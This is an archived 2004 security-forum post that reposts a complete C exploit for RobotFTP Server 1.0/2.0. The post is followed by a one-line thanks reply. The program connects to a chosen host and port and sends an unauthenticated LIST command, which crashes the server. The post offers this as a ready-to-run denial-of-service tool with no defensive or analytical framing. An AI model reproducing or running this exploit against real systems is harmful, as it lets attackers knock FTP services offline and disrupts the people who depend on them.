hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
GaLiaRePt
Feb 24 2004, 06:17 PM
Robotftp Denial of Service exploit
Date: 2004-02-24

Author : NoRpiUs <norpius@altervista.org>
Download : http://www.security-corporation.com/download/exploit/robo.c

CODE
/ ********************************************************************************
*****************
* *
* Date: 18/2/2004 *
* Url: www.robotftp.com *
* Versions: 1.0/2.0 *
* Bug: Robotftp gets DoS'sed when an unauthorized user tries to do some command like MKD or LIST *
* Author: NoRpiUs *
* Email: norpius@altervista.org *
* Web: http://norpius.altervista.org *
* For Unix & Win *
* *
* I have done this for my birthday that is today :) - Robo-SOFT don't be angry :) *
********************************************************************************
******************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#ifdef WIN32
#include <winsock.h>
#include <windows.h>
#define close closesocket
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif
#define DOSREQUEST "\x4C\x49\x53\x54\r\n"

void errore( char *err )
{
printf("%s",err);
exit(1);
}

void usage( char *progz )
{
fputs("Robotftp FTP Server remote DoS\n"
"By NoRpiUs\n"
"Usage: <host> <port>\n", stdout);
exit(1);
}

int main( int argc, char *argv[] )
{
int sock;
struct hostent *he;
struct sockaddr_in target;
char recvbuff[512];

#ifdef WIN32
WSADATA wsadata;
WSAStartup(0x1, &wsadata);
#endif

if ( argc < 3 ) usage(argv[0]);

if ( (he = gethostbyname(argv[1])) == NULL )
errore("Can't resolve host");

target.sin_family = AF_INET;
target.sin_addr = *(( struct in_addr *) he -> h_addr );
target.sin_port = htons(atoi(argv[2]));

fputs("[+] Connecting...\n", stdout);

if ( (sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP )) < 0)
errore("[-] Can't create socket\n");

if ( connect(sock, (struct sockaddr *) &target, sizeof(target)) < 0 )
errore("[-] Can't connect\n");

if ( recv( sock, recvbuff, sizeof(recvbuff), 0) < 0 )
errore("[-] Server seems to be down\n");

fputs("[+] Sending DoS request\n", stdout);

if ( send( sock, DOSREQUEST, strlen(DOSREQUEST), 0) < 0 )
errore("[-] Cant' send the request\n");

fputs("[+] Done\n", stdout);

close(sock);

return(0);

}
invisible-boy
Feb 24 2004, 07:08 PM
thx GaLiaRePt.
nice
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.